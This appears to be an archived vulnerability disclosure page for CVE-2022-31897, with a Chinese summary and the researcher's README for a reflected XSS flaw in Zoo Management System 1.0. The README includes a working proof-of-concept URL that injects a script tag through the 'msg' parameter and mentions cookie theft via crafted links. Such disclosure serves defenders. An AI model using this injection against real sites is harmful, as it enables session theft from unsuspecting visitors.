CVE-2022-31897 PoC — Zoo Management System 跨站脚本漏洞

Source

https://github.com/angelopioamirante/CVE-2022-31897

Associated Vulnerability

Title:Zoo Management System 跨站脚本漏洞 (CVE-2022-31897)
Description:PHPGURUKUL Zoo Management System是Phpgurukul团队的一个动物园管理系统。 Zoo Management System 1.0版本存在安全漏洞。攻击者利用该漏洞执行跨站脚本攻击。

Description

Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)

Readme

# CVE-2022-31897

# Date: 06/22/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Server: XAMPP on Windows 10 
# CVE: CVE-2022-31897

# Description:
Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.

# Impact:
An attacker could steal cookies with a crafted URL sent to the victims.

# Exploit:

Visit the following page: 

1. http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script>

2. Alert pop up is fired!


# Image poc:

- [Registration page](https://ibb.co/8XKDgJX)
- [XSS](https://ibb.co/mTTmTmy)

File Snapshot


 [4.0K]  /data/pocs/cc85c64b7892f7c1abcd658c44c4d5da4a4b02ce
└── [ 868]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!